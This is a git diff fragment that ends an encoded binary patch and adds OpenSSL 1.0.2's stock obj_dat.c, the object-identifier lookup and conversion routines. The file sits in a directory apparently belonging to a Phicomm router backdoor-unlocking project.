z(WY+CK|`Tw4-9J75{#Szu^El2?rwZ^X7(A(G_|PiP`7tkm({^8>qB(_QubQ^U7T79
z)|@PEmQ61aI}gcieBc6DjoZ!WRh^25>VyES*_P`NZ+!SMxYq1WH^J?h9dOa6Hp0~j
zm&V^^%~7x2la<o-iP%i+_h(cf{PsS$O#9&iZYg0tui12}U2~lQz#a3I*)9v#$r-RZ
zS<0PKNLrU`6QaFKLzqHmG;X~`vF^!_OmEVPc2EAx^d+qkzlI&n8VT%<Tj%x+se9ES
z^=?&n5;-u~ua(~p4r{irISfH)Ry@=Md57qIv6=ZXo>k5I%=*B*LABmI_Rpi5l?nMZ
z>w<M{NIia@93$k}D?oRCH4R{Lru6#!Y<a>*%y44zd}(#%Me{V2XaH?P89HTcy+g?w
zu+PpvN{8)%P}8useiaSGT;hzEp9^Bl3kpdc=(0W?r2FJmGsu?U%rxc@7sgSvUO?L`
z=a=%J{t}zHREFWCb&ub=c>F@;Xf=1uI0q|YLHSyD2blizpl_-?Uf70f=zv`!un(_h
zxWlyvVK0Bf4?~r0FwJ)<O3QT~HWOXU@-t6@Z_@b4OyjR-sxunI<R=}5yawG6KCZz%
z$KRr%T8Be$TFhA+LK<6Y&7v{B@i}AE>?BS6ayjusPS#=SS2-ctw@uDW_*&j8!EtcZ
ze`zyRA6uBW!*cl6mJpB2GGX1PHda1{gj)k4$k5+e-k{iE#huctt$5g}P1xP9;Zpx+
z(E6-D_6DTt|D8Zi#FaR+8O{h+5K~*8$Ba9krUpWO>s=V>`2>TAhXQl)(DK@N+6*n%
z?86Y-)QUNX^Nhc$ifGH;(DEaVn!V+3N$VZ0GOJe3&O6&pvt8!k>@+%)!G7zLKAsH7
z=8$IRqS{<%6#YX?-@9C?SoENw!A|l8Js4$aa<<IW#)lv>2b!ZrMfGdlc_`mp6b}Dc
zKAO|Bsd1wiNfXl9-o7~)9^6;Tnx$Y%WPK!hYwWfXy^S4N7mY+W+~mM$)CWI2l+aFR
z&me)5c?K~&zEM^=4XOKjAE}!N)LpZ@!T&8tJ?dP`#&9d5Y=9q~DYQEg*s26hc;ZS^
z*&A1a`DIFzI;#ZK7ZiWn6<xI(YHI}fAYXDCf;JDcejM9`5-58PDSqgp@9!f9veaoP
z_H)*!35Gt#KEtp+Y<rc!L9n1f_jQJM;iINQ34GJjrZhe5O(?-BUqT6=T%sz`6ZLUr
zQ@KG^TD`05ludCZsw&|&B?!zmCD2A=xdqfiXanRIcmZ1{J*v`l!mBF5vM;W*dVZn=
z0Z^$*7$^gb{|fSZkPkUJ;cZ90=Qo_`<o6ikK8{?-0p>I6`2nO+@nar-%EnjYI0(-9
zG{XiF(14y){J1uMWcVKthd8G^38m>IuFVNwyAm!h=}@+Lo>IaPIK=BrF$7c}KCVFy
z;DyEj!)1)ub03WsV!@%s1YP>b`<2DUyo<h3VeRqiTd3uw)w&SF$B{>{gLQ+_3_ryA
z{Z5J!(gJNA*x>>5_D;snGaj$Qy$pYl;j|W^k36*hBExwd9%J}fhVxqdHr%6MTr(8z
z7yDki`><D&A40cI$b*j!{R~?4dx`;k-DfGEvz&d+RKQ9D?=EP)3!<nEd8@mshP_0)
z{Isdz*z=P5g#g@PZS%Q`gBM-!cU|!Ry5Lw)i`icW1-BS}CEzO|Z|{R13Ox^?#l5>2
ze}fDDRc5ChS`>PIK-=TO-|d2rxZnp|@FRd@{3qF7q-PEIwO#m+x!_MSJDb@Sqh}D<
zdD?|P&G^e%X*~{Hls~)h|H}BUGCn<nfPcw_{}JPdS!vO;3HU2uo{O!^)h>7taLmuY
znH_poft{EOf3pkT=7N*j19mv4r!pCRe^yUwYQLt(d(~u8SNl3iZr^?MG0X<qd%L$0
zd@SqxOWAZ$FPf?J7-8zgT){Mk_4IgNRzstr+WvxJNLu@|lu*<&BdlW{%o}>PG+xDZ
zR1+g46hIz{B-^7z?@ac#sY$)JqoY4Dpbw~R$%IadW7G;X2U3}mL5gMpL(Ggo^o5aB
zafGz@?b<fbOU;wswmbD6wL77YW=BmvGH#6PX|s?)rL6I_8VPQIIBZN%FL0ABWinMQ
z$Z0N35`BGozGUh~p^z&eFJA(mRX_I{CYmi6W?|GgU=ZC&s-7Mh)Ay%FGc{&vco><Z
z*`iS}YjD9B&w(C{3>z84G-@Nxy3mmvu5YSvuRN$bi-sIXwLWSZ<3(~mf;DD3W2CYr
znz3QDgJimbIG0@B=@Sxx+C+hJqfa${a&MxjgW)siQ+V@6NibaI<8uoI_3>H9`QJeh
zMCSk4fhk|KkIxkpna|G|**<=Qp&*WbfpEWgUZZe3_<TmGhkcHMe0(Ny{#62gy?{3}
zoZF#q@G!ns;EQ(FOMLG4ZVBga7Go}U@&X<d;yEnY!Fiw@7x-d454rGvB;Xhe&%+Zg
z_)~&?alL-!!k-oRVmxOBKE5Mzzj$7w;Cya`AIIMkaM4Z!E(i$nzYIUl4={W!U}8Po
zB;Z#G{B?pI(S8fVu|Xd^&#J&*E!f#A;G&%!E_QT*FYcGq5}()4If0MgJAA%NSRvss
z#>ne)1;Y_*7WlUc_!<FMB|F^j4gnX}YrkMeT(6RVi*bHeup`F#guo9A@jNZ@dH(5N
zV!*?Du?}By;lCo-7xR2kz^@Vfek9r9`D|hV$a%h#;n-l!@paiH@!2g&3w$yD`(5}4
z1il#mNdXt*e?q{;^?g>d&*OYw!ufocvG*4ozD1bV4FWFO-@$M>KYIl}K5Mw&5rHq(
zl_~JWx_U&wZx-zQQoz3=;C~WuF+cwha54VN4431-wjPXvaGb|~Bf~L2G5B$Ot;FZ~
zj0ya80)LalXUjq20)M^0-zxF>_uF;}2Nfz~tVO%xxmR|<UlwpNZ$XA*9`MIy1M6@c
zYZN8pG?a^Dd3JwH!uj_se;?p>USzye68|i_e@?>r_tcvb&cBbs>^Z{i^Y53P63)Lz
z9+2?rcZY=Y?_c`gEBNO2`FF?55}$ux_>m~^`S${e6c3J@seRCz1*aY1y@HWRMNDJD
zB$45inIe&W#UhCma(ILESR_Uw>D>6Zkp)UNXBrXsEA3Y2b>F$aH(QG23%NYJiyj13
zG-%*^A$%M-@qFHE5DegySvgkCwX)ubG{DkR<zdZXt+rMXr*jYc2n(}<$LAC3^7`j>
zw}#>D7<ZK6`Xuwq_ZJ_K@A0fdo3j2XrqBIweeR#%<5_@l;T{)->n{^Q==1sWwv}N~
ziFbzi$FolquE*Oh803ACcY*1P81`lEF2L|#8djc2p>mPw2iZMu<oVwZ187s$_p`r#
z!qR}OkLSi>>;Di-JpNySg6og}b#Z;ZE{pj_eiX?d=h%YdxqK!3WPPN`YYz|!D0qec
aSETsm{Cxp9i|N0IhcCz>r>S0L{r>?X(~hD5

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.c
new file mode 100644
index 0000000..5cd755d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.c
@@ -0,0 +1,796 @@
+/* crypto/objects/obj_dat.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include <limits.h>
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/bn.h>
+
+/* obj_dat.h is generated from objects.h by obj_dat.pl */
+#ifndef OPENSSL_NO_OBJECT
+# include "obj_dat.h"
+#else
+/* You will have to load all the objects needed manually in the application */
+# define NUM_NID 0
+# define NUM_SN 0
+# define NUM_LN 0
+# define NUM_OBJ 0
+static const unsigned char lvalues[1];
+static const ASN1_OBJECT nid_objs[1];
+static const unsigned int sn_objs[1];
+static const unsigned int ln_objs[1];
+static const unsigned int obj_objs[1];
+#endif
+
+DECLARE_OBJ_BSEARCH_CMP_FN(const ASN1_OBJECT *, unsigned int, sn);
+DECLARE_OBJ_BSEARCH_CMP_FN(const ASN1_OBJECT *, unsigned int, ln);
+DECLARE_OBJ_BSEARCH_CMP_FN(const ASN1_OBJECT *, unsigned int, obj);
+
+#define ADDED_DATA      0
+#define ADDED_SNAME     1
+#define ADDED_LNAME     2
+#define ADDED_NID       3
+
+typedef struct added_obj_st {
+    int type;
+    ASN1_OBJECT *obj;
+} ADDED_OBJ;
+DECLARE_LHASH_OF(ADDED_OBJ);
+
+static int new_nid = NUM_NID;
+static LHASH_OF(ADDED_OBJ) *added = NULL;
+
+static int sn_cmp(const ASN1_OBJECT *const *a, const unsigned int *b)
+{
+    return (strcmp((*a)->sn, nid_objs[*b].sn));
+}
+
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(const ASN1_OBJECT *, unsigned int, sn);
+
+static int ln_cmp(const ASN1_OBJECT *const *a, const unsigned int *b)
+{
+    return (strcmp((*a)->ln, nid_objs[*b].ln));
+}
+
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(const ASN1_OBJECT *, unsigned int, ln);
+
+static unsigned long added_obj_hash(const ADDED_OBJ *ca)
+{
+    const ASN1_OBJECT *a;
+    int i;
+    unsigned long ret = 0;
+    unsigned char *p;
+
+    a = ca->obj;
+    switch (ca->type) {
+    case ADDED_DATA:
+        ret = a->length << 20L;
+        p = (unsigned char *)a->data;
+        for (i = 0; i < a->length; i++)
+            ret ^= p[i] << ((i * 3) % 24);
+        break;
+    case ADDED_SNAME:
+        ret = lh_strhash(a->sn);
+        break;
+    case ADDED_LNAME:
+        ret = lh_strhash(a->ln);
+        break;
+    case ADDED_NID:
+        ret = a->nid;
+        break;
+    default:
+        /* abort(); */
+        return 0;
+    }
+    ret &= 0x3fffffffL;
+    ret |= ((unsigned long)ca->type) << 30L;
+    return (ret);
+}
+
+static IMPLEMENT_LHASH_HASH_FN(added_obj, ADDED_OBJ)
+
+static int added_obj_cmp(const ADDED_OBJ *ca, const ADDED_OBJ *cb)
+{
+    ASN1_OBJECT *a, *b;
+    int i;
+
+    i = ca->type - cb->type;
+    if (i)
+        return (i);
+    a = ca->obj;
+    b = cb->obj;
+    switch (ca->type) {
+    case ADDED_DATA:
+        i = (a->length - b->length);
+        if (i)
+            return (i);
+        return (memcmp(a->data, b->data, (size_t)a->length));
+    case ADDED_SNAME:
+        if (a->sn == NULL)
+            return (-1);
+        else if (b->sn == NULL)
+            return (1);
+        else
+            return (strcmp(a->sn, b->sn));
+    case ADDED_LNAME:
+        if (a->ln == NULL)
+            return (-1);
+        else if (b->ln == NULL)
+            return (1);
+        else
+            return (strcmp(a->ln, b->ln));
+    case ADDED_NID:
+        return (a->nid - b->nid);
+    default:
+        /* abort(); */
+        return 0;
+    }
+}
+
+static IMPLEMENT_LHASH_COMP_FN(added_obj, ADDED_OBJ)
+
+static int init_added(void)
+{
+    if (added != NULL)
+        return (1);
+    added = lh_ADDED_OBJ_new();
+    return (added != NULL);
+}
+
+static void cleanup1_doall(ADDED_OBJ *a)
+{
+    a->obj->nid = 0;
+    a->obj->flags |= ASN1_OBJECT_FLAG_DYNAMIC |
+        ASN1_OBJECT_FLAG_DYNAMIC_STRINGS | ASN1_OBJECT_FLAG_DYNAMIC_DATA;
+}
+
+static void cleanup2_doall(ADDED_OBJ *a)
+{
+    a->obj->nid++;
+}
+
+static void cleanup3_doall(ADDED_OBJ *a)
+{
+    if (--a->obj->nid == 0)
+        ASN1_OBJECT_free(a->obj);
+    OPENSSL_free(a);
+}
+
+static IMPLEMENT_LHASH_DOALL_FN(cleanup1, ADDED_OBJ)
+static IMPLEMENT_LHASH_DOALL_FN(cleanup2, ADDED_OBJ)
+static IMPLEMENT_LHASH_DOALL_FN(cleanup3, ADDED_OBJ)
+
+/*
+ * The purpose of obj_cleanup_defer is to avoid EVP_cleanup() attempting to
+ * use freed up OIDs. If neccessary the actual freeing up of OIDs is delayed.
+ */
+int obj_cleanup_defer = 0;
+
+void check_defer(int nid)
+{
+    if (!obj_cleanup_defer && nid >= NUM_NID)
+        obj_cleanup_defer = 1;
+}
+
+void OBJ_cleanup(void)
+{
+    if (obj_cleanup_defer) {
+        obj_cleanup_defer = 2;
+        return;
+    }
+    if (added == NULL)
+        return;
+    lh_ADDED_OBJ_down_load(added) = 0;
+    lh_ADDED_OBJ_doall(added, LHASH_DOALL_FN(cleanup1)); /* zero counters */
+    lh_ADDED_OBJ_doall(added, LHASH_DOALL_FN(cleanup2)); /* set counters */
+    lh_ADDED_OBJ_doall(added, LHASH_DOALL_FN(cleanup3)); /* free objects */
+    lh_ADDED_OBJ_free(added);
+    added = NULL;
+}
+
+int OBJ_new_nid(int num)
+{
+    int i;
+
+    i = new_nid;
+    new_nid += num;
+    return (i);
+}
+
+int OBJ_add_object(const ASN1_OBJECT *obj)
+{
+    ASN1_OBJECT *o;
+    ADDED_OBJ *ao[4] = { NULL, NULL, NULL, NULL }, *aop;
+    int i;
+
+    if (added == NULL)
+        if (!init_added())
+            return (0);
+    if ((o = OBJ_dup(obj)) == NULL)
+        goto err;
+    if (!(ao[ADDED_NID] = (ADDED_OBJ *)OPENSSL_malloc(sizeof(ADDED_OBJ))))
+        goto err2;
+    if ((o->length != 0) && (obj->data != NULL))
+        if (!
+            (ao[ADDED_DATA] = (ADDED_OBJ *)OPENSSL_malloc(sizeof(ADDED_OBJ))))
+            goto err2;
+    if (o->sn != NULL)
+        if (!
+            (ao[ADDED_SNAME] =
+             (ADDED_OBJ *)OPENSSL_malloc(sizeof(ADDED_OBJ))))
+            goto err2;
+    if (o->ln != NULL)
+        if (!
+            (ao[ADDED_LNAME] =
+             (ADDED_OBJ *)OPENSSL_malloc(sizeof(ADDED_OBJ))))
+            goto err2;
+
+    for (i = ADDED_DATA; i <= ADDED_NID; i++) {
+        if (ao[i] != NULL) {
+            ao[i]->type = i;
+            ao[i]->obj = o;
+            aop = lh_ADDED_OBJ_insert(added, ao[i]);
+            /* memory leak, buit should not normally matter */
+            if (aop != NULL)
+                OPENSSL_free(aop);
+        }
+    }
+    o->flags &=
+        ~(ASN1_OBJECT_FLAG_DYNAMIC | ASN1_OBJECT_FLAG_DYNAMIC_STRINGS |
+          ASN1_OBJECT_FLAG_DYNAMIC_DATA);
+
+    return (o->nid);
+ err2:
+    OBJerr(OBJ_F_OBJ_ADD_OBJECT, ERR_R_MALLOC_FAILURE);
+ err:
+    for (i = ADDED_DATA; i <= ADDED_NID; i++)
+        if (ao[i] != NULL)
+            OPENSSL_free(ao[i]);
+    if (o != NULL)
+        OPENSSL_free(o);
+    return (NID_undef);
+}
+
+ASN1_OBJECT *OBJ_nid2obj(int n)
+{
+    ADDED_OBJ ad, *adp;
+    ASN1_OBJECT ob;
+
+    if ((n >= 0) && (n < NUM_NID)) {
+        if ((n != NID_undef) && (nid_objs[n].nid == NID_undef)) {
+            OBJerr(OBJ_F_OBJ_NID2OBJ, OBJ_R_UNKNOWN_NID);
+            return (NULL);
+        }
+        return ((ASN1_OBJECT *)&(nid_objs[n]));
+    } else if (added == NULL)
+        return (NULL);
+    else {
+        ad.type = ADDED_NID;
+        ad.obj = &ob;
+        ob.nid = n;
+        adp = lh_ADDED_OBJ_retrieve(added, &ad);
+        if (adp != NULL)
+            return (adp->obj);
+        else {
+            OBJerr(OBJ_F_OBJ_NID2OBJ, OBJ_R_UNKNOWN_NID);
+            return (NULL);
+        }
+    }
+}
+
+const char *OBJ_nid2sn(int n)
+{
+    ADDED_OBJ ad, *adp;
+    ASN1_OBJECT ob;
+
+    if ((n >= 0) && (n < NUM_NID)) {
+        if ((n != NID_undef) && (nid_objs[n].nid == NID_undef)) {
+            OBJerr(OBJ_F_OBJ_NID2SN, OBJ_R_UNKNOWN_NID);
+            return (NULL);
+        }
+        return (nid_objs[n].sn);
+    } else if (added == NULL)
+        return (NULL);
+    else {
+        ad.type = ADDED_NID;
+        ad.obj = &ob;
+        ob.nid = n;
+        adp = lh_ADDED_OBJ_retrieve(added, &ad);
+        if (adp != NULL)
+            return (adp->obj->sn);
+        else {
+            OBJerr(OBJ_F_OBJ_NID2SN, OBJ_R_UNKNOWN_NID);
+            return (NULL);
+        }
+    }
+}
+
+const char *OBJ_nid2ln(int n)
+{
+    ADDED_OBJ ad, *adp;
+    ASN1_OBJECT ob;
+
+    if ((n >= 0) && (n < NUM_NID)) {
+        if ((n != NID_undef) && (nid_objs[n].nid == NID_undef)) {
+            OBJerr(OBJ_F_OBJ_NID2LN, OBJ_R_UNKNOWN_NID);
+            return (NULL);
+        }
+        return (nid_objs[n].ln);
+    } else if (added == NULL)
+        return (NULL);
+    else {
+        ad.type = ADDED_NID;
+        ad.obj = &ob;
+        ob.nid = n;
+        adp = lh_ADDED_OBJ_retrieve(added, &ad);
+        if (adp != NULL)
+            return (adp->obj->ln);
+        else {
+            OBJerr(OBJ_F_OBJ_NID2LN, OBJ_R_UNKNOWN_NID);
+            return (NULL);
+        }
+    }
+}
+
+static int obj_cmp(const ASN1_OBJECT *const *ap, const unsigned int *bp)
+{
+    int j;
+    const ASN1_OBJECT *a = *ap;
+    const ASN1_OBJECT *b = &nid_objs[*bp];
+
+    j = (a->length - b->length);
+    if (j)
+        return (j);
+    return (memcmp(a->data, b->data, a->length));
+}
+
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(const ASN1_OBJECT *, unsigned int, obj);
+
+int OBJ_obj2nid(const ASN1_OBJECT *a)
+{
+    const unsigned int *op;
+    ADDED_OBJ ad, *adp;
+
+    if (a == NULL)
+        return (NID_undef);
+    if (a->nid != 0)
+        return (a->nid);
+
+    if (added != NULL) {
+        ad.type = ADDED_DATA;
+        ad.obj = (ASN1_OBJECT *)a; /* XXX: ugly but harmless */
+        adp = lh_ADDED_OBJ_retrieve(added, &ad);
+        if (adp != NULL)
+            return (adp->obj->nid);
+    }
+    op = OBJ_bsearch_obj(&a, obj_objs, NUM_OBJ);
+    if (op == NULL)
+        return (NID_undef);
+    return (nid_objs[*op].nid);
+}
+
+/*
+ * Convert an object name into an ASN1_OBJECT if "noname" is not set then
+ * search for short and long names first. This will convert the "dotted" form
+ * into an object: unlike OBJ_txt2nid it can be used with any objects, not
+ * just registered ones.
+ */
+
+ASN1_OBJECT *OBJ_txt2obj(const char *s, int no_name)
+{
+    int nid = NID_undef;
+    ASN1_OBJECT *op = NULL;
+    unsigned char *buf;
+    unsigned char *p;
+    const unsigned char *cp;
+    int i, j;
+
+    if (!no_name) {
+        if (((nid = OBJ_sn2nid(s)) != NID_undef) ||
+            ((nid = OBJ_ln2nid(s)) != NID_undef))
+            return OBJ_nid2obj(nid);
+    }
+
+    /* Work out size of content octets */
+    i = a2d_ASN1_OBJECT(NULL, 0, s, -1);
+    if (i <= 0) {
+        /* Don't clear the error */
+        /*
+         * ERR_clear_error();
+         */
+        return NULL;
+    }
+    /* Work out total size */
+    j = ASN1_object_size(0, i, V_ASN1_OBJECT);
+
+    if ((buf = (unsigned char *)OPENSSL_malloc(j)) == NULL)
+        return NULL;
+
+    p = buf;
+    /* Write out tag+length */
+    ASN1_put_object(&p, 0, i, V_ASN1_OBJECT, V_ASN1_UNIVERSAL);
+    /* Write out contents */
+    a2d_ASN1_OBJECT(p, i, s, -1);
+
+    cp = buf;
+    op = d2i_ASN1_OBJECT(NULL, &cp, j);
+    OPENSSL_free(buf);
+    return op;
+}
+
+int OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name)
+{
+    int i, n = 0, len, nid, first, use_bn;
+    BIGNUM *bl;
+    unsigned long l;
+    const unsigned char *p;
+    char tbuf[DECIMAL_SIZE(i) + DECIMAL_SIZE(l) + 2];
+
+    /* Ensure that, at every state, |buf| is NUL-terminated. */
+    if (buf && buf_len > 0)
+        buf[0] = '\0';
+
+    if ((a == NULL) || (a->data == NULL))
+        return (0);
+
+    if (!no_name && (nid = OBJ_obj2nid(a)) != NID_undef) {
+        const char *s;
+        s = OBJ_nid2ln(nid);
+        if (s == NULL)
+            s = OBJ_nid2sn(nid);
+        if (s) {
+            if (buf)
+                BUF_strlcpy(buf, s, buf_len);
+            n = strlen(s);
+            return n;
+        }
+    }
+
+    len = a->length;
+    p = a->data;
+
+    first = 1;
+    bl = NULL;
+
+    while (len > 0) {
+        l = 0;
+        use_bn = 0;
+        for (;;) {
+            unsigned char c = *p++;
+            len--;
+            if ((len == 0) && (c & 0x80))
+                goto err;
+            if (use_bn) {
+                if (!BN_add_word(bl, c & 0x7f))
+                    goto err;
+            } else
+                l |= c & 0x7f;
+            if (!(c & 0x80))
+                break;
+            if (!use_bn && (l > (ULONG_MAX >> 7L))) {
+                if (!bl && !(bl = BN_new()))
+                    goto err;
+                if (!BN_set_word(bl, l))
+                    goto err;
+                use_bn = 1;
+            }
+            if (use_bn) {
+                if (!BN_lshift(bl, bl, 7))
+                    goto err;
+            } else
+                l <<= 7L;
+        }
+
+        if (first) {
+            first = 0;
+            if (l >= 80) {
+                i = 2;
+                if (use_bn) {
+                    if (!BN_sub_word(bl, 80))
+                        goto err;
+                } else
+                    l -= 80;
+            } else {
+                i = (int)(l / 40);
+                l -= (long)(i * 40);
+            }
+            if (buf && (buf_len > 1)) {
+                *buf++ = i + '0';
+                *buf = '\0';
+                buf_len--;
+            }
+            n++;
+        }
+
+        if (use_bn) {
+            char *bndec;
+            bndec = BN_bn2dec(bl);
+            if (!bndec)
+                goto err;
+            i = strlen(bndec);
+            if (buf) {
+                if (buf_len > 1) {
+                    *buf++ = '.';
+                    *buf = '\0';
+                    buf_len--;
+                }
+                BUF_strlcpy(buf, bndec, buf_len);
+                if (i > buf_len) {
+                    buf += buf_len;
+                    buf_len = 0;
+                } else {
+                    buf += i;
+                    buf_len -= i;
+                }
+            }
+            n++;
+            n += i;
+            OPENSSL_free(bndec);
+        } else {
+            BIO_snprintf(tbuf, sizeof tbuf, ".%lu", l);
+            i = strlen(tbuf);
+            if (buf && (buf_len > 0)) {
+                BUF_strlcpy(buf, tbuf, buf_len);
+                if (i > buf_len) {
+                    buf += buf_len;
+                    buf_len = 0;
+                } else {
+                    buf += i;
+                    buf_len -= i;
+                }
+            }
+            n += i;
+            l = 0;
+        }
+    }
+
+    if (bl)
+        BN_free(bl);
+    return n;
+
+ err:
+    if (bl)
+        BN_free(bl);
+    return -1;
+}
+
+int OBJ_txt2nid(const char *s)
+{
+    ASN1_OBJECT *obj;
+    int nid;
+    obj = OBJ_txt2obj(s, 0);
+    nid = OBJ_obj2nid(obj);
+    ASN1_OBJECT_free(obj);
+    return nid;
+}
+
+int OBJ_ln2nid(const char *s)
+{
+    ASN1_OBJECT o;
+    const ASN1_OBJECT *oo = &o;
+    ADDED_OBJ ad, *adp;
+    const unsigned int *op;
+
+    o.ln = s;
+    if (added != NULL) {
+        ad.type = ADDED_LNAME;
+        ad.obj = &o;
+        adp = lh_ADDED_OBJ_retrieve(added, &ad);
+        if (adp != NULL)
+            return (adp->obj->nid);
+    }
+    op = OBJ_bsearch_ln(&oo, ln_objs, NUM_LN);
+    if (op == NULL)
+        return (NID_undef);
+    return (nid_objs[*op].nid);
+}
+
+int OBJ_sn2nid(const char *s)
+{
+    ASN1_OBJECT o;
+    const ASN1_OBJECT *oo = &o;
+    ADDED_OBJ ad, *adp;
+    const unsigned int *op;
+
+    o.sn = s;
+    if (added != NULL) {
+        ad.type = ADDED_SNAME;
+        ad.obj = &o;
+        adp = lh_ADDED_OBJ_retrieve(added, &ad);
+        if (adp != NULL)
+            return (adp->obj->nid);
+    }
+    op = OBJ_bsearch_sn(&oo, sn_objs, NUM_SN);
+    if (op == NULL)
+        return (NID_undef);
+    return (nid_objs[*op].nid);
+}
+
+const void *OBJ_bsearch_(const void *key, const void *base, int num, int size,
+                         int (*cmp) (const void *, const void *))
+{
+    return OBJ_bsearch_ex_(key, base, num, size, cmp, 0);
+}
+
+const void *OBJ_bsearch_ex_(const void *key, const void *base_, int num,
+                            int size,
+                            int (*cmp) (const void *, const void *),
+                            int flags)
+{
+    const char *base = base_;
+    int l, h, i = 0, c = 0;
+    const char *p = NULL;
+
+    if (num == 0)
+        return (NULL);
+    l = 0;
+    h = num;
+    while (l < h) {
+        i = (l + h) / 2;
+        p = &(base[i * size]);
+        c = (*cmp) (key, p);
+        if (c < 0)
+            h = i;
+        else if (c > 0)
+            l = i + 1;
+        else
+            break;
+    }
+#ifdef CHARSET_EBCDIC
+    /*
+     * THIS IS A KLUDGE - Because the *_obj is sorted in ASCII order, and I
+     * don't have perl (yet), we revert to a *LINEAR* search when the object
+     * wasn't found in the binary search.
+     */
+    if (c != 0) {
+        for (i = 0; i < num; ++i) {
+            p = &(base[i * size]);
+            c = (*cmp) (key, p);
+            if (c == 0 || (c < 0 && (flags & OBJ_BSEARCH_VALUE_ON_NOMATCH)))
+                return p;
+        }
+    }
+#endif
+    if (c != 0 && !(flags & OBJ_BSEARCH_VALUE_ON_NOMATCH))
+        p = NULL;
+    else if (c == 0 && (flags & OBJ_BSEARCH_FIRST_VALUE_ON_MATCH)) {
+        while (i > 0 && (*cmp) (key, &(base[(i - 1) * size])) == 0)
+            i--;
+        p = &(base[i * size]);
+    }
+    return (p);
+}
+
+int OBJ_create_objects(BIO *in)
+{
+    MS_STATIC char buf[512];
+    int i, num = 0;
+    char *o, *s, *l = NULL;
+
+    for (;;) {
+        s = o = NULL;
+        i = BIO_gets(in, buf, 512);
+        if (i <= 0)
+            return (num);
+        buf[i - 1] = '\0';
+        if (!isalnum((unsigned char)buf[0]))
+            return (num);
+        o = s = buf;
+        while (isdigit((unsigned char)*s) || (*s == '.'))
+            s++;
+        if (*s != '\0') {
+            *(s++) = '\0';
+            while (isspace((unsigned char)*s))
+                s++;
+            if (*s == '\0')
+                s = NULL;
+            else {
+                l = s;
+                while ((*l != '\0') && !isspace((unsigned char)*l))
+                    l++;
+                if (*l != '\0') {
+                    *(l++) = '\0';
+                    while (isspace((unsigned char)*l))
+                        l++;
+                    if (*l == '\0')
+                        l = NULL;
+                } else
+                    l = NULL;
+            }
+        } else
+            s = NULL;
+        if ((o == NULL) || (*o == '\0'))
+            return (num);
+        if (!OBJ_create(o, s, l))
+            return (num);
+        num++;
+    }
+    /* return(num); */
+}
+
+int OBJ_create(const char *oid, const char *sn, const char *ln)
+{
+    int ok = 0;
+    ASN1_OBJECT *op = NULL;
+    unsigned char *buf;
+    int i;
+
+    i = a2d_ASN1_OBJECT(NULL, 0, oid, -1);
+    if (i <= 0)
+        return (0);
+
+    if ((buf = (unsigned char *)OPENSSL_malloc(i)) == NULL) {
+        OBJerr(OBJ_F_OBJ_CREATE, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    i = a2d_ASN1_OBJECT(buf, i, oid, -1);
+    if (i == 0)
+        goto err;
+    op = (ASN1_OBJECT *)ASN1_OBJECT_create(OBJ_new_nid(1), buf, i, sn, ln);
+    if (op == NULL)
+        goto err;
+    ok = OBJ_add_object(op);
+ err:
+    ASN1_OBJECT_free(op);
+    OPENSSL_free(buf);
+    return (ok);
+}
